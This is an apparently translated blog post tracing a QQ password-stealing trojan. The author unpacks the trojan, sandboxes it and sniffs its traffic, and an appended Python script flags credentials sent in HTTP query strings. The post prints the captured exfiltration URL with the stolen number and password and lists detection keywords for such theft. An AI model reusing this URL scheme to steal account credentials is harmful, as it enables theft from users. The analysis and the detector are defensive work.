The process of tracking stolen QQ Trojan

Source: Internet
Author: User

This morning a colleague said her QQ account had been stolen: it still worked last night, but this morning the password was rejected. She only uses QQ on her own computer, so the problem should be on that machine.

On her machine I used Autoruns and found two suspicious EXEs, a syssmss.exe and a test.exe. Both had the same size and icon, so they should be the same file. PEiD reported no packer, nothing at all; well, "nothing" is itself something. And they sat in the "C:/Program Files/internet explorer/" directory, which is more unusual still. Using PEQ and IceSword I also found two suspicious DLLs, but could not yet be sure about them.

I took the samples back to my own machine. First I unpacked the two DLLs with WINUPX and looked at their strings in Win32Dasm; the strings looked fairly "normal", with no particular Trojan features, so perhaps they were something like the 3721 rogue software (that is my current guess; there is far too much rogue software around). Re-analysing syssmss.exe, PEiD 0.94 still reported nothing, and the latest Rising and Norton found no virus, but PEiD showed the EP Section as .NSP1, which should be the signature of some packer. Searching the Internet for .NSP1 turned up only a single article on the Snow forum that used the term; reading it, it was roughly a piece of software's packing routine. Of course, what I most wanted to see was the strings inside, and for that the file had to be unpacked; fortunately that is relatively simple, and just looking at the strings does not require that the unpacked program actually run. After loading it in OD (OllyDbg), it stopped on the PUSHAD and PUSHFD instructions. Following the example in the forum post, I searched directly for POPFD and found code of the form "popfd / popad / jmp xxxxxx"; that JMP target is the OEP. I set a breakpoint there, reached xxxx, dumped a file, and PEiD then identified it as Delphi. Haha, although the unpacked program could not run successfully, at least the string references were visible. Opening it in Win32Dasm and listing the string references showed plenty of common Trojan strings: Qq.exe, Wow.exe, mir3.exe, findprocess and the like. It might as well have "I am a Trojan" written on its forehead. It is also rather ruthless: from QQ to online games, it wants every kind of account. (Reminds me of ... "IP, IC, IQ card, tell me the password.")

Next, to find where the data goes, I ran Win2000 in VMware (try it on my own machine? You think I'm stupid?), preferably taking a snapshot before running anything, and installed QQ. On the VMware host I ran Iris with a filter on the IP of the machine inside VMware; to be safe I also ran Winsock Expert inside VMware. Then I ran syssmss.exe and pointed Wsock at syssmss.exe for monitoring. As soon as syssmss.exe ran there were several reports: it was reaching out to a website, apparently to download a virus file (or an update), but it seemed unable to connect and then went quiet.
I ran QQ.exe and typed a random number, 233223, with password 33213313. Very quickly both Iris and Wsock had packet records, and putting the address together gave something like "http://www.yhppy.meibu.com/q21/sg.asp?urlna=233223&urlpa=33213313". So the QQ number and password were being sent to an ASP file on that website. Because it is not sent by email or FTP, there was no way to go further.
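The sniffer capture above shows the account and password leaving in a plain HTTP GET query string. As an added example (not part of the original post), the script below runs the same check over constructed sniffer-style lines: it parses each request URL, flags any whose query carries both an account-like and a password-like parameter, and reports the destination without repeating the secret values. The `urlna`/`urlpa` names come from the captured request; the other parameter names and the log line format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample of sniffer output, one HTTP request per line in the
# hypothetical format "<src> -> <dst> GET <url>". The first line mirrors
# the exfiltration request seen in the analysis; the rest are noise.
SAMPLE_LOG = """\
192.168.1.10 -> 203.0.113.5 GET http://www.yhppy.meibu.com/q21/sg.asp?urlna=233223&urlpa=33213313
192.168.1.10 -> 203.0.113.6 GET http://203.0.113.6/update/check.asp?ver=2
192.168.1.10 -> 203.0.113.7 GET http://203.0.113.7/index.html
"""

# Parameter names that carried the account and password in the captured
# request, plus a few generic names (assumed, not from the analysis).
ACCOUNT_KEYS = {"urlna", "qq", "user", "name"}
PASSWORD_KEYS = {"urlpa", "pass", "pwd", "password"}

LINE_RE = re.compile(r"^(\S+) -> (\S+) GET (\S+)$")


def classify_request(url):
    """Return (host, path, account_key, password_key) when the query string
    carries both an account-like and a password-like parameter, else None."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    acct = next((k for k in query if k.lower() in ACCOUNT_KEYS), None)
    pwd = next((k for k in query if k.lower() in PASSWORD_KEYS), None)
    if acct is None or pwd is None:
        return None
    return parts.hostname, parts.path, acct, pwd


def find_credential_exfil(log_text):
    """Scan sniffer lines and report each suspected credential exfiltration,
    recording parameter names only so the report does not re-leak secrets."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not HTTP GET records
        src, dst, url = m.groups()
        hit = classify_request(url)
        if hit:
            host, path, acct, pwd = hit
            hits.append({"src": src, "dst": dst, "host": host,
                         "path": path, "params": (acct, pwd)})
    return hits


if __name__ == "__main__":
    for h in find_credential_exfil(SAMPLE_LOG):
        print(f"{h['src']} -> {h['host']}{h['path']} leaks via {h['params']}")
```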

Then I stopped syssmss.exe, deleted it, and after a restart ran QQ.exe again with an arbitrary account: no data was captured, so there is probably no further infection action. Call it a day, and leave a note as a memo.
